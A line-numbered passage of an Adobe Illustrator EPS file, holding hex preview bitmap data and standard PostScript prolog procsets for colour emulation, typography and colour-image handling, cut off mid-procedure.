%A9A8A9A8A9A8A9A8A9A87D527E7D52527E527D527E7DA952A9A8A9A8A9A8 269 | %A9A8A9A8A9A8A9A8A9A8FD2AFFA8A9A8A9A8A9A8A9A8A9A8FD1BFFA8A9A8 270 | %A9A8A9A8A9A8A9A8A9A8A9A8A9A8A97DA97DA9A8A97DA97DA9A87E7DA9A8 271 | %A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8FD29FFA9A8A9A8A9A8A9A8A9A8FD 272 | %1DFFA8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A87E7D7D52A9FD047D27A952 273 | %A827A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8FD2AFFA8A884A9A8A884A9A8 274 | %A8A8FD1BFFA8A9A8A884A9A8A884A9A8A884A9A8A884A9A8A884A952A859 275 | %A97D7D59A97DA8597E7DA884A9A8A884A9A8A884A9A8A8A8FD29FFA9A8A9 276 | %A8A9A8A9A8A9A8FD1DFFA8A9A8A9A8A9A8A9A8A9A8A9A8A9527D7D7D27A9 277 | %FD067D52FD057D52A8A8A9A8A9A8A9A8A9A8A9A8A9A8FD2AFFA8A9A8A9A8 278 | %A9A8A9A8A9A8FD1BFFA8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A97DA9A8A97D 279 | %A97D7E7D7E7DA97D7E7D7E7DA9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8FD29 280 | %FFA9A8A9A8A9A8A9A8A9A8AFFD1CFFA8A9A8A9A8A9A8A9A8A9A8A9A8A9A8 281 | %7D277DA87E7D7D527E527D7DA8527E52537DA9A8A9A8A9A8A9A8A9A8A9A8 282 | %A9A8FD2AFF84A9A8A884A9A8A884A9A8FD1BFFA8A884A9A8A884A9A8A884 283 | %A9A8A884A9A8A884A97DA884A97DA884A9A8A884A9A8A884A9A8A884A9A8 284 | %A884A9A8A884A9A8FD29FFA9A8A9A8A9A8A9A8A9A8FD1DFFA8A9A8A9A8A9 285 | %A8A9A8A9A8A9A8A9A8A9A8A9A8A97DA9A8A9A8A9A8A9A8A9A8A9A8A9A8A9 286 | %A8A9A8A9A8A9A8A9A8A9A8FD1DFFA8FFFFFFA8FFFFFFA8FD04FFA8A9A8A9 287 | %A8A9A8A9A8A9A8FD1BFFA8A9A8A9A8A9A8A9A8A9A8A9A8A9A8525253277E 288 | %5228527D527D527E5253527E7D527DA9A8A9A8A9A8A9A8A9A8A9A8A9A8FD 289 | %1CFFA852A87DA8527DFF7DFD04FFA9A8A9A8A9A8A9A8A9A8FD1DFFA8A9A8 290 | %A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8 291 | %A9A8A9A8A9A8A9A8A9A8A9A8A9A8FD25FFA8FD04FFA8A884A9A8A884A9A8 292 | %A8A8FD1BFFA8A9A8A884A9A8A884A9A8A884A9A8A8527D52522E7D525227 293 | %537D52527E7D7D2EA9A8A884A9A8A884A9A8A884A9A8A8A8FD21FFA8FFA8 294 | %A8FFFF2F2FA9A8A9A8A9A8A9A8A9A8FD1DFFA8A9A8A9A8A9A8A9A8A9A8A9 295 | %A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9 296 | %A8A9A8A9A8FD21FF7D27FFA827A8FF2F07A8A9A8A9A8A9A8A9A8A9A8FD1B 297 | %FFA8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8 298 | %A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8FD27FF597EA9A8A9A8A9 299 | %A8A9A8A9A8AFFD1CFFA8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8 300 | %A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8FD2AFF84 301 | %A9A8A884A9A8A884A9A8FD1BFFA8A884A9A8A884A9A8A884A9A8A884A9A8 302 | %A884A9A8A884A9A8A884A9A8A884A9A8A884A9A8A884A9A8A884A9A8A884 303 | %A9A8FD29FFA9A8A9A8A9A8A9A8A9A8FD1DFFA8A9A8A9A8A9A8A9A8A9A8A9 304 | %A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9A8A9 305 | %A8A9A8A9A8FD2AFF29302F2F29302F2F29302F2F2F542F2F2F542F2F2F54 306 | %2F2F2F542F2F2F542F2F2F542F2F2F542F2F29302F2F29302F2F29302F2F 307 | %29302F2F29302F2F29302F2F29302F2F29302F2F29302F2F29302F2F2930 308 | %2F2F29302F2F2F542F2F2F542F2F2F542F2F2F542F2F2F542F2F2F542F2F 309 | %2F542F2F2F542F2F2F542F2F2F542F2F07072F0707072F0707072F070707 310 | %2F0707072F0707072F0707072F0707072F0707072F0707072F0707072F07 311 | %07072F0707072F0707072F0707072F0707072F0707072F0707072F070707 312 | %2F0707072F0707072F0707072F0707072F0707072F0707072F0707072F07 313 | %07072F0707072F0707072F0707072F0707072F0707072F07060706070607 314 | %060706070607060706070607060706070607060706070607060706070607 315 | %060706070607060706070607060706070607060706070607060706070607 316 | %060706070607060706070607060706070607060706070607060706070607 317 | %060706070607060706070607060706070607060706070607060706070607 318 | %06072F072F072F072F072F072F072F072F072F072F072F072F072F072F07 319 | %2F072F072F072F072F072F072F072F072F072F072F072F072F072F072F07 320 | %2F072F072F072F072F072F072F072F072F072F072F072F072F072F072F07 321 | %2F072F072F072F072F072F072F072F072F072F072F072F072F072F072F07 322 | %2F072F072F072F072F07FDFCFFFD83FFFF 323 | %%EndData 324 | %%EndComments 325 | %%BeginProlog 326 | %%BeginResource: procset Adobe_level2_AI5 1.2 0 327 | %%Title: (Adobe Illustrator (R) Version 5.0 Level 2 Emulation) 328 | %%Version: 1.2 0 329 | %%CreationDate: (04/10/93) () 330 | %%Copyright: ((C) 1987-1996 Adobe Systems Incorporated All Rights Reserved) 331 | userdict /Adobe_level2_AI5 26 dict dup begin 332 | put 333 | /packedarray where not 334 | { 335 | userdict begin 336 | /packedarray 337 | { 338 | array astore readonly 339 | } bind def 340 | /setpacking /pop load def 341 | /currentpacking false def 342 | end 343 | 0 344 | } if 345 | pop 346 | userdict /defaultpacking currentpacking put true setpacking 347 | /initialize 348 | { 349 | Adobe_level2_AI5 begin 350 | } bind def 351 | /terminate 352 | { 353 | currentdict Adobe_level2_AI5 eq 354 | { 355 | end 356 | } if 357 | } bind def 358 | mark 359 | /setcustomcolor where not 360 | { 361 | /findcmykcustomcolor 362 | { 363 | (AI8_CMYK_CustomColor) 364 | 6 packedarray 365 | } bind def 366 | /findrgbcustomcolor 367 | { 368 | (AI8_RGB_CustomColor) 369 | 5 packedarray 370 | } bind def 371 | /setcustomcolor 372 | { 373 | exch 374 | aload pop dup 375 | (AI8_CMYK_CustomColor) eq 376 | { 377 | pop pop 378 | 4 379 | { 380 | 4 index mul 381 | 4 1 roll 382 | } repeat 383 | 5 -1 roll pop 384 | setcmykcolor 385 | } 386 | { 387 | dup (AI8_RGB_CustomColor) eq 388 | { 389 | pop pop 390 | 3 391 | { 392 | 1 exch sub 393 | 3 index mul 394 | 1 exch sub 395 | 3 1 roll 396 | } repeat 397 | 4 -1 roll pop 398 | setrgbcolor 399 | } 400 | { 401 | pop 402 | 4 403 | { 404 | 4 index mul 4 1 roll 405 | } repeat 406 | 5 -1 roll pop 407 | setcmykcolor 408 | } ifelse 409 | } ifelse 410 | } 411 | def 412 | } if 413 | 414 | /setAIseparationgray 415 | { 416 | /setcolorspace where 417 | { 418 | pop 419 | [/Separation (All) /DeviceCMYK { dup dup dup }] setcolorspace 420 | 1 exch sub setcolor 421 | } 422 | { 423 | setgray 424 | } ifelse 425 | } def 426 | 427 | /gt38? mark {version cvr cvx exec} stopped {cleartomark true} {38 gt exch pop} ifelse def 428 | userdict /deviceDPI 72 0 matrix defaultmatrix dtransform dup mul exch dup mul add sqrt put 429 | userdict /level2? 430 | systemdict /languagelevel known dup 431 | { 432 | pop systemdict /languagelevel get 2 ge 433 | } if 434 | put 435 | /level2ScreenFreq 436 | { 437 | begin 438 | 60 439 | HalftoneType 1 eq 440 | { 441 | pop Frequency 442 | } if 443 | HalftoneType 2 eq 444 | { 445 | pop GrayFrequency 446 | } if 447 | HalftoneType 5 eq 448 | { 449 | pop Default level2ScreenFreq 450 | } if 451 | end 452 | } bind def 453 | userdict /currentScreenFreq 454 | level2? {currenthalftone level2ScreenFreq} {currentscreen pop pop} ifelse put 455 | level2? not 456 | { 457 | /setcmykcolor where not 458 | { 459 | /setcmykcolor 460 | { 461 | exch .11 mul add exch .59 mul add exch .3 mul add 462 | 1 exch sub setgray 463 | } def 464 | } if 465 | /currentcmykcolor where not 466 | { 467 | /currentcmykcolor 468 | { 469 | 0 0 0 1 currentgray sub 470 | } def 471 | } if 472 | /setoverprint where not 473 | { 474 | /setoverprint /pop load def 475 | } if 476 | /selectfont where not 477 | { 478 | /selectfont 479 | { 480 | exch findfont exch 481 | dup type /arraytype eq 482 | { 483 | makefont 484 | } 485 | { 486 | scalefont 487 | } ifelse 488 | setfont 489 | } bind def 490 | } if 491 | /cshow where not 492 | { 493 | /cshow 494 | { 495 | [ 496 | 0 0 5 -1 roll aload pop 497 | ] cvx bind forall 498 | } bind def 499 | } if 500 | } if 501 | cleartomark 502 | /anyColor? 503 | { 504 | add add add 0 ne 505 | } bind def 506 | /testColor 507 | { 508 | gsave 509 | setcmykcolor currentcmykcolor 510 | grestore 511 | } bind def 512 | /testCMYKColorThrough 513 | { 514 | testColor anyColor? 515 | } bind def 516 | userdict /composite? 517 | 1 0 0 0 testCMYKColorThrough 518 | 0 1 0 0 testCMYKColorThrough 519 | 0 0 1 0 testCMYKColorThrough 520 | 0 0 0 1 testCMYKColorThrough 521 | and and and 522 | put 523 | composite? not 524 | { 525 | userdict begin 526 | gsave 527 | /cyan? 1 0 0 0 testCMYKColorThrough def 528 | /magenta? 0 1 0 0 testCMYKColorThrough def 529 | /yellow? 0 0 1 0 testCMYKColorThrough def 530 | /black? 0 0 0 1 testCMYKColorThrough def 531 | grestore 532 | /isCMYKSep? cyan? magenta? yellow? black? or or or def 533 | /customColor? isCMYKSep? not def 534 | end 535 | } if 536 | end defaultpacking setpacking 537 | %%EndResource 538 | %%BeginResource: procset Adobe_typography_AI5 1.0 1 539 | %%Title: (Typography Operators) 540 | %%Version: 1.0 1 541 | %%CreationDate:(6/10/1996) () 542 | %%Copyright: ((C) 1987-1996 Adobe Systems Incorporated All Rights Reserved) 543 | currentpacking true setpacking 544 | userdict /Adobe_typography_AI5 68 dict dup begin 545 | put 546 | /initialize 547 | { 548 | begin 549 | begin 550 | Adobe_typography_AI5 begin 551 | Adobe_typography_AI5 552 | { 553 | dup xcheck 554 | { 555 | bind 556 | } if 557 | pop pop 558 | } forall 559 | end 560 | end 561 | end 562 | Adobe_typography_AI5 begin 563 | } def 564 | /terminate 565 | { 566 | currentdict Adobe_typography_AI5 eq 567 | { 568 | end 569 | } if 570 | } def 571 | /modifyEncoding 572 | { 573 | /_tempEncode exch ddef 574 | /_pntr 0 ddef 575 | { 576 | counttomark -1 roll 577 | dup type dup /marktype eq 578 | { 579 | pop pop exit 580 | } 581 | { 582 | /nametype eq 583 | { 584 | _tempEncode /_pntr dup load dup 3 1 roll 1 add ddef 3 -1 roll 585 | put 586 | } 587 | { 588 | /_pntr exch ddef 589 | } ifelse 590 | } ifelse 591 | } loop 592 | _tempEncode 593 | } def 594 | /havefont 595 | { 596 | systemdict /languagelevel known 597 | { 598 | /Font resourcestatus dup 599 | { exch pop exch pop } 600 | if 601 | } 602 | { 603 | systemdict /FontDirectory get 1 index known 604 | { pop true } 605 | { 606 | systemdict /fileposition known 607 | { 608 | dup length 6 add exch 609 | Ss 6 250 getinterval 610 | cvs pop 611 | Ss exch 0 exch getinterval 612 | status 613 | { pop pop pop pop true } 614 | { false } 615 | ifelse 616 | } 617 | { 618 | pop false 619 | } 620 | ifelse 621 | } 622 | ifelse 623 | } 624 | ifelse 625 | } def 626 | /TE 627 | { 628 | StandardEncoding 256 array copy modifyEncoding 629 | /_nativeEncoding exch def 630 | } def 631 | /subststring { 632 | exch 2 index exch search 633 | { 634 | exch pop 635 | exch dup () eq 636 | { 637 | pop exch concatstring 638 | } 639 | { 640 | 3 -1 roll 641 | exch concatstring 642 | concatstring 643 | } ifelse 644 | exch pop true 645 | } 646 | { 647 | pop pop false 648 | } ifelse 649 | } def 650 | /concatstring { 651 | 1 index length 1 index length 652 | 1 index add 653 | string 654 | dup 0 5 index putinterval 655 | dup 2 index 4 index putinterval 656 | 4 1 roll pop pop pop 657 | } def 658 | % 659 | /TZ 660 | { 661 | dup type /arraytype eq 662 | { 663 | /_wv exch def 664 | } 665 | { 666 | /_wv 0 def 667 | } ifelse 668 | /_useNativeEncoding exch def 669 | 2 index havefont 670 | { 671 | 3 index 672 | 255 string 673 | cvs 674 | 675 | dup 676 | (_Symbol_) 677 | eq 678 | { 679 | pop 680 | 2 index 681 | findfont 682 | 683 | } 684 | { 685 | 1 index 0 eq 686 | { 687 | dup length 1 sub 688 | 1 exch 689 | getinterval 690 | 691 | cvn 692 | findfont 693 | } 694 | { 695 | pop 2 index findfont 696 | } ifelse 697 | } ifelse 698 | } 699 | { 700 | dup 1 eq 701 | { 702 | 2 index 64 string cvs 703 | dup (-90pv-RKSJ-) (-83pv-RKSJ-) subststring 704 | { 705 | exch pop dup havefont 706 | { 707 | findfont false 708 | } 709 | { 710 | pop true 711 | } ifelse 712 | } 713 | { 714 | pop dup 715 | (-90ms-RKSJ-) (-Ext-RKSJ-) subststring 716 | { 717 | exch pop dup havefont 718 | { 719 | findfont false 720 | } 721 | { 722 | pop true 723 | } ifelse 724 | } 725 | { 726 | pop pop true 727 | } ifelse 728 | } ifelse 729 | { 730 | 1 index 1 eq 731 | { 732 | /Ryumin-Light-Ext-RKSJ-V havefont 733 | {/Ryumin-Light-Ext-RKSJ-V} 734 | {/Courier} 735 | ifelse 736 | } 737 | { 738 | /Ryumin-Light-83pv-RKSJ-H havefont 739 | {/Ryumin-Light-83pv-RKSJ-H} 740 | {/Courier} 741 | ifelse 742 | } ifelse 743 | findfont 744 | [1 0 0.5 1 0 0] makefont 745 | } if 746 | } 747 | { 748 | /Courier findfont 749 | } ifelse 750 | } ifelse 751 | _wv type /arraytype eq 752 | { 753 | _wv makeblendedfont 754 | } if 755 | dup length 10 add dict 756 | begin 757 | mark exch 758 | { 759 | 1 index /FID ne 760 | { 761 | def 762 | } if 763 | cleartomark mark 764 | } forall 765 | pop 766 | /FontScript exch def 767 | /FontDirection exch def 768 | /FontRequest exch def 769 | /FontName exch def 770 | counttomark 0 eq 771 | { 772 | 1 _useNativeEncoding eq 773 | { 774 | /Encoding _nativeEncoding def 775 | } if 776 | cleartomark 777 | } 778 | { 779 | /Encoding load 256 array copy 780 | modifyEncoding /Encoding exch def 781 | } ifelse 782 | FontName currentdict 783 | end 784 | definefont pop 785 | } def 786 | /tr 787 | { 788 | _ax _ay 3 2 roll 789 | } def 790 | /trj 791 | { 792 | _cx _cy _sp _ax _ay 6 5 roll 793 | } def 794 | /a0 795 | { 796 | /Tx 797 | { 798 | dup 799 | currentpoint 3 2 roll 800 | tr _psf 801 | newpath moveto 802 | tr _ctm _pss 803 | } ddef 804 | /Tj 805 | { 806 | dup 807 | currentpoint 3 2 roll 808 | trj _pjsf 809 | newpath moveto 810 | trj _ctm _pjss 811 | } ddef 812 | } def 813 | /a1 814 | { 815 | W B 816 | } def 817 | /e0 818 | { 819 | /Tx 820 | { 821 | tr _psf 822 | } ddef 823 | /Tj 824 | { 825 | trj _pjsf 826 | } ddef 827 | } def 828 | /e1 829 | { 830 | W F 831 | } def 832 | /i0 833 | { 834 | /Tx 835 | { 836 | tr sp 837 | } ddef 838 | /Tj 839 | { 840 | trj jsp 841 | } ddef 842 | } def 843 | /i1 844 | { 845 | W N 846 | } def 847 | /o0 848 | { 849 | /Tx 850 | { 851 | tr sw rmoveto 852 | } ddef 853 | /Tj 854 | { 855 | trj swj rmoveto 856 | } ddef 857 | } def 858 | /r0 859 | { 860 | /Tx 861 | { 862 | tr _ctm _pss 863 | } ddef 864 | /Tj 865 | { 866 | trj _ctm _pjss 867 | } ddef 868 | } def 869 | /r1 870 | { 871 | W S 872 | } def 873 | /To 874 | { 875 | pop _ctm currentmatrix pop 876 | } def 877 | /TO 878 | { 879 | iTe _ctm setmatrix newpath 880 | } def 881 | /Tp 882 | { 883 | pop _tm astore pop _ctm setmatrix 884 | _tDict begin 885 | /W 886 | { 887 | } def 888 | /h 889 | { 890 | } def 891 | } def 892 | /TP 893 | { 894 | end 895 | iTm 0 0 moveto 896 | } def 897 | /Tr 898 | { 899 | _render 3 le 900 | { 901 | currentpoint newpath moveto 902 | } if 903 | dup 8 eq 904 | { 905 | pop 0 906 | } 907 | { 908 | dup 9 eq 909 | { 910 | pop 1 911 | } if 912 | } ifelse 913 | dup /_render exch ddef 914 | _renderStart exch get load exec 915 | } def 916 | /iTm 917 | { 918 | _ctm setmatrix _tm concat 919 | _shift aload pop _lineorientation 1 eq { exch } if translate 920 | _scale aload pop _lineorientation 1 eq _yokoorientation 1 eq or { exch } if scale 921 | } def 922 | /Tm 923 | { 924 | _tm astore pop iTm 0 0 moveto 925 | } def 926 | /Td 927 | { 928 | _mtx translate _tm _tm concatmatrix pop iTm 0 0 moveto 929 | } def 930 | /iTe 931 | { 932 | _render -1 eq 933 | { 934 | } 935 | { 936 | _renderEnd _render get dup null ne 937 | { 938 | load exec 939 | } 940 | { 941 | pop 942 | } ifelse 943 | } ifelse 944 | /_render -1 ddef 945 | } def 946 | /Ta 947 | { 948 | pop 949 | } def 950 | /Tf 951 | { 952 | 1 index type /nametype eq 953 | { 954 | dup 0.75 mul 1 index 0.25 mul neg 955 | } if 956 | /_fontDescent exch ddef 957 | /_fontAscent exch ddef 958 | /_fontSize exch ddef 959 | /_fontRotateAdjust _fontAscent _fontDescent add 2 div neg ddef 960 | /_fontHeight _fontSize ddef 961 | findfont _fontSize scalefont setfont 962 | } def 963 | /Tl 964 | { 965 | pop neg 0 exch 966 | _leading astore pop 967 | } def 968 | /Tt 969 | { 970 | pop 971 | } def 972 | /TW 973 | { 974 | 3 npop 975 | } def 976 | /Tw 977 | { 978 | /_cx exch ddef 979 | } def 980 | /TC 981 | { 982 | 3 npop 983 | } def 984 | /Tc 985 | { 986 | /_ax exch ddef 987 | } def 988 | /Ts 989 | { 990 | 0 exch 991 | _shift astore pop 992 | currentpoint 993 | iTm 994 | moveto 995 | } def 996 | /Ti 997 | { 998 | 3 npop 999 | } def 1000 | /Tz 1001 | { 1002 | count 1 eq { 100 } if 1003 | 100 div exch 100 div exch 1004 | _scale astore pop 1005 | iTm 1006 | } def 1007 | /TA 1008 | { 1009 | pop 1010 | } def 1011 | /Tq 1012 | { 1013 | pop 1014 | } def 1015 | /Tg 1016 | { 1017 | pop 1018 | } def 1019 | /TG 1020 | { 1021 | pop 1022 | } def 1023 | /Tv 1024 | { 1025 | /_lineorientation exch ddef 1026 | } def 1027 | /TV 1028 | { 1029 | /_charorientation exch ddef 1030 | } def 1031 | /Ty 1032 | { 1033 | dup /_yokoorientation exch ddef 1 sub neg Tv 1034 | } def 1035 | /TY 1036 | { 1037 | pop 1038 | } def 1039 | /T~ 1040 | { 1041 | Tx 1042 | } def 1043 | /Th 1044 | { 1045 | pop pop pop pop pop 1046 | } def 1047 | /TX 1048 | { 1049 | pop 1050 | } def 1051 | /Tk 1052 | { 1053 | _fontSize mul 1000 div 1054 | _lineorientation 0 eq { neg 0 } { 0 exch } ifelse 1055 | rmoveto 1056 | pop 1057 | } def 1058 | /TK 1059 | { 1060 | 2 npop 1061 | } def 1062 | /T* 1063 | { 1064 | _leading aload pop 1065 | _lineorientation 0 ne { exch } if 1066 | Td 1067 | } def 1068 | /T*- 1069 | { 1070 | _leading aload pop 1071 | _lineorientation 0 ne { exch } if 1072 | exch neg exch neg 1073 | Td 1074 | } def 1075 | /T- 1076 | { 1077 | _ax neg 0 rmoveto 1078 | _lineorientation 1 eq _charorientation 0 eq and { 1 TV _hyphen Tx 0 TV } { _hyphen Tx } ifelse 1079 | } def 1080 | /T+ 1081 | { 1082 | } def 1083 | /TR 1084 | { 1085 | _ctm currentmatrix pop 1086 | _tm astore pop 1087 | iTm 0 0 moveto 1088 | } def 1089 | /TS 1090 | { 1091 | currentfont 3 1 roll 1092 | /_Symbol_ findfont _fontSize scalefont setfont 1093 | 1094 | 0 eq 1095 | { 1096 | Tx 1097 | } 1098 | { 1099 | Tj 1100 | } ifelse 1101 | setfont 1102 | } def 1103 | /Xb 1104 | { 1105 | pop pop 1106 | } def 1107 | /Tb /Xb load def 1108 | /Xe 1109 | { 1110 | pop pop pop pop 1111 | } def 1112 | /Te /Xe load def 1113 | /XB 1114 | { 1115 | } def 1116 | /TB /XB load def 1117 | currentdict readonly pop 1118 | end 1119 | setpacking 1120 | % 1121 | /X^ 1122 | { 1123 | currentfont 5 1 roll 1124 | dup havefont 1125 | { 1126 | findfont _fontSize scalefont setfont 1127 | } 1128 | { 1129 | pop 1130 | exch 1131 | } ifelse 1132 | 2 index 0 eq 1133 | { 1134 | Tx 1135 | } 1136 | { 1137 | Tj 1138 | } ifelse 1139 | pop pop 1140 | setfont 1141 | } def 1142 | /T^ /X^ load def 1143 | %%EndResource 1144 | %%BeginProcSet: Adobe_ColorImage_AI6 1.2 0 1145 | userdict /Adobe_ColorImage_AI6 known not 1146 | { 1147 | userdict /Adobe_ColorImage_AI6 50 dict put 1148 | } if 1149 | userdict /Adobe_ColorImage_AI6 get begin 1150 | /initialize { 1151 | Adobe_ColorImage_AI6 begin 1152 | Adobe_ColorImage_AI6 { 1153 | dup type /arraytype eq { 1154 | dup xcheck { 1155 | bind 1156 | } if 1157 | } if 1158 | pop pop 1159 | } forall 1160 | } def 1161 | /terminate { end } def 1162 | currentdict /Adobe_ColorImage_AI6_Vars known not { 1163 | /Adobe_ColorImage_AI6_Vars 40 dict def 1164 | } if 1165 | Adobe_ColorImage_AI6_Vars begin 1166 | /plateindex -1 def 1167 | /_newproc null def 1168 | /_proc1 null def 1169 | /_proc2 null def 1170 | /channelcount 0 def 1171 | /sourcecount 0 def 1172 | /sourcearray 4 array def 1173 | /_ptispace null def 1174 | /_ptiname null def 1175 | /_pti0 0 def 1176 | /_pti1 0 def 1177 | /_ptiproc null def 1178 | /_ptiscale 0 def 1179 | /_pticomps 0 def 1180 | /_ptibuf 0 string def 1181 | /_gtigray 0 def 1182 | /_cticmyk null def 1183 | /_rtirgb null def 1184 | /XIEnable true def 1185 | /XIType 0 def 1186 | /XIEncoding 0 def 1187 | /XICompression 0 def 1188 | /XIChannelCount 0 def 1189 | /XIBitsPerPixel 0 def 1190 | /XIImageHeight 0 def 1191 | /XIImageWidth 0 def 1192 | /XIImageMatrix null def 1193 | /XIRowBytes 0 def 1194 | /XIFile null def 1195 | /XIBuffer1 null def 1196 | /XIBuffer2 null def 1197 | /XIDataProc null def 1198 | /XIVersion 6 def 1199 | /XIColorSpace /DeviceGray def 1200 | /XIColorValues 0 def 1201 | end 1202 | currentdict /_colorimage known not { 1203 | /colorimage where { 1204 | /colorimage get /_colorimage exch def 1205 | }{ 1206 | /_colorimage null def 1207 | } ifelse 1208 | } if 1209 | /_image systemdict /image get def 1210 | /_currenttransfer systemdict /currenttransfer get def 1211 | /FourEqual { 1212 | 4 index ne { 1213 | pop pop pop false 1214 | }{ 1215 | 4 index ne { 1216 | pop pop false 1217 | }{ 1218 | 4 index ne { 1219 | pop false 1220 | }{ 1221 | 4 index eq 1222 | } ifelse 1223 | } ifelse 1224 | } ifelse 1225 | } def 1226 | /TestPlateIndex { 1227 | Adobe_ColorImage_AI6_Vars begin 1228 | /plateindex -1 def 1229 | /setcmykcolor where { 1230 | pop 1231 | gsave 1232 | 1 0 0 0 setcmykcolor systemdict /currentgray get exec 1 exch sub 1233 | 0 1 0 0 setcmykcolor systemdict /currentgray get exec 1 exch sub 1234 | 0 0 1 0 setcmykcolor systemdict /currentgray get exec 1 exch sub 1235 | 0 0 0 1 setcmykcolor systemdict /currentgray get exec 1 exch sub 1236 | grestore 1237 | 1 0 0 0 FourEqual { 1238 | /plateindex 0 def 1239 | }{ 1240 | 0 1 0 0 FourEqual { 1241 | /plateindex 1 def 1242 | }{ 1243 | 0 0 1 0 FourEqual { 1244 | /plateindex 2 def 1245 | }{ 1246 | 0 0 0 1 FourEqual { 1247 | /plateindex 3 def 1248 | }{ 1249 | 0 0 0 0 FourEqual { 1250 | /plateindex 5 def 1251 | } if 1252 | } ifelse 1253 | } ifelse 1254 | } ifelse 1255 | } ifelse 1256 | pop pop pop pop 1257 | } if 1258 | plateindex 1259 | end 1260 | } def 1261 | /concatprocs { 1262 | /packedarray where { 1263 | pop dup type /packedarraytype eq 2 index type 1264 | /packedarraytype eq or 1265 | }{ 1266 | false 1267 | } ifelse 1268 | { 1269 | /_proc2 exch cvlit def 1270 | /_proc1 exch cvlit def 1271 | _proc1 aload pop 1272 | _proc2 aload pop 1273 | _proc1 length 1274 | _proc2 length add 1275 | packedarray cvx 1276 | }{ 1277 | /_proc2 exch cvlit def 1278 | /_proc1 exch cvlit def 1279 | /_newproc _proc1 length _proc2 length add array def 1280 | _newproc 0 _proc1 putinterval 1281 | _newproc _proc1 length _proc2 putinterval 1282 | _newproc cvx 1283 | } ifelse 1284 | } def 1285 | /clrspaceissepn { 1286 | type /arraytype eq 1287 | } def 1288 | /clrspacegetname { 1289 | dup clrspaceissepn {dup length 2 sub get}{pop ()} ifelse 1290 | } def 1291 | /clrspacegetalt { 1292 | aload pop pop pop colormake 1293 | } def 1294 | /clrspacegetcomps { 1295 | dup /DeviceGray eq { 1296 | pop 1 1297 | }{ 1298 | dup /DeviceRGB eq { 1299 | pop 3 1300 | }{ 1301 | /DeviceCMYK eq { 1302 | 4 1303 | }{ 1304 | 1 1305 | } ifelse 1306 | } ifelse 1307 | } ifelse 1308 | } def 1309 | /clrspacemarksplate { 1310 | dup /DeviceGray eq { 1311 | pop plateindex 3 eq 1312 | }{ 1313 | dup /DeviceRGB eq { 1314 | pop plateindex 5 ne 1315 | }{ 1316 | dup /DeviceCMYK eq { 1317 | pop plateindex 5 ne 1318 | }{ 1319 | /findcmykcustomcolor where { 1320 | pop 1321 | dup length 2 sub get 1322 | 0.1 0.1 0.1 0.1 5 -1 roll 1323 | findcmykcustomcolor 1 setcustomcolor 1324 | systemdict /currentgray get exec 1325 | 1 ne 1326 | }{ 1327 | pop plateindex 5 ne 1328 | } ifelse 1329 | } ifelse 1330 | } ifelse 1331 | } ifelse 1332 | } def 1333 | /colormake { 1334 | dup clrspacegetcomps 1335 | exch 1 index 2 add 1 roll 1336 | dup 1 eq {pop}{array astore} ifelse 1337 | exch 1338 | } def 1339 | /colorexpand { 1340 | dup clrspacegetname exch 1341 | dup clrspaceissepn { 1342 | clrspacegetalt 1343 | exch 4 1 roll 1344 | }{ 1345 | 1 3 1 roll 1346 | } ifelse 1347 | } def 1348 | /colortint { 1349 | dup /DeviceGray eq { 1350 | 3 1 roll 1 exch sub mul 1 exch sub exch 1351 | }{ 1352 | dup /DeviceRGB eq { 1353 | 3 1 roll {1 exch sub 1 index mul 1 exch sub exch} forall pop 3 array astore exch 1354 | }{ 1355 | dup /DeviceCMYK eq { 1356 | 3 1 roll {1 index mul exch} forall pop 4 array astore exch 1357 | }{ 1358 | 3 1 roll mul exch 1359 | } ifelse 1360 | } ifelse 1361 | } ifelse 1362 | } def 1363 | /colortocmyk { 1364 | dup /DeviceGray eq { 1365 | pop 1 exch sub 0 0 0 4 -1 roll 4 array astore 1366 | }{ 1367 | dup /DeviceRGB eq { 1368 | pop aload pop _rgbtocmyk 4 array astore 1369 | }{ 1370 | dup /DeviceCMYK eq { 1371 | pop 1372 | }{ 1373 | clrspacegetalt colortint colortocmyk 1374 | } ifelse 1375 | } ifelse 1376 | } ifelse 1377 | } def 1378 | /makeimagedict { 1379 | 7 dict begin 1380 | /ImageType 1 def 1381 | /Decode exch def 1382 | /DataSource exch def 1383 | /ImageMatrix exch def 1384 | /BitsPerComponent exch def 1385 | /Height exch def 1386 | /Width exch def 1387 | currentdict end 1388 | } def 1389 | /stringinvert { 1390 | 0 1 2 index length 1 sub { 1391 | dup 2 index exch get 255 exch sub 2 index 3 1 roll put 1392 | } for 1393 | } def 1394 | /stringknockout { 1395 | 0 1 2 index length 1 sub { 1396 | 255 2 index 3 1 roll put 1397 | } for 1398 | } def 1399 | /stringapply { 1400 | 0 1 4 index length 1 sub { 1401 | dup 1402 | 4 index exch get 1403 | 3 index 3 1 roll 1404 | 3 index exec 1405 | } for 1406 | pop exch pop 1407 | } def 1408 | /WalkRGBString { 1409 | 0 3 index 1410 | dup length 1 sub 0 3 3 -1 roll { 1411 | 3 getinterval {} forall 1412 | 5 index exec 1413 | 3 index 1414 | } for 1415 | 1416 | 5 {pop} repeat 1417 | } def 1418 | /WalkCMYKString 1419 | { 1420 | 0 3 index 1421 | dup length 1 sub 0 4 3 -1 roll { 1422 | 4 getinterval {} forall 1423 | 1424 | 6 index exec 1425 | 1426 | 3 index 1427 | 1428 | } for 1429 | 1430 | 5 { pop } repeat 1431 | 1432 | } def 1433 | /StuffRGBIntoGrayString 1434 | { 1435 | .11 mul exch 1436 | 1437 | .59 mul add exch 1438 | 1439 | .3 mul add 1440 | 1441 | cvi 3 copy put 1442 | 1443 | pop 1 add 1444 | } def 1445 | /StuffCMYKIntoGrayString 1446 | { 1447 | exch .11 mul add 1448 | 1449 | exch .59 mul add 1450 | 1451 | exch .3 